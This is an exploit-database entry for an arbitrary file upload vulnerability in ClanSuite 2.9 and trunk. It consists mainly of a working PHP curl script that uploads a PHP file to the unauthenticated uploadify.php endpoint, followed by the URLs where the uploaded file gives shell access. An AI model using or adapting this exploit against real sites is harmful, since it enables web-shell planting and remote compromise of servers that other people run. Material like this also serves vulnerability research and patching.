ClanSuite 2.9 Shell Upload

2012.06.12
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

########################################################### # # Exploit Title: ClanSuite 2.9 Arbitrary File Upload # Date: 29/05/2012 # Exploit Author: Adrien Thierry # Vendor Homepage: http://clansuite.com/ # Software Link : https://github.com/jakoch/Clansuite # or : http://svn.gna.org/svn/clansuite/trunk/ # Version: 2.9 and Trunk Revision 6400 # ########################################################### Vuln page : uploads/uploadify.php exploit : <?php $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php"; $c = curl_init("http://mysite.com/uploads/uploadify.php"); // Version 2.9 $c = curl_init("http://mysite.com/application/uploads/uploadify.php"); // Version trunk curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array('Filedata'=>"@$u", 'name'=>"info.php")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?> shell access : http://mysite.com/uploads/temps/info.php or : http://mysite.com/application/uploads/temps/info.php #########

References:

http://clansuite.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top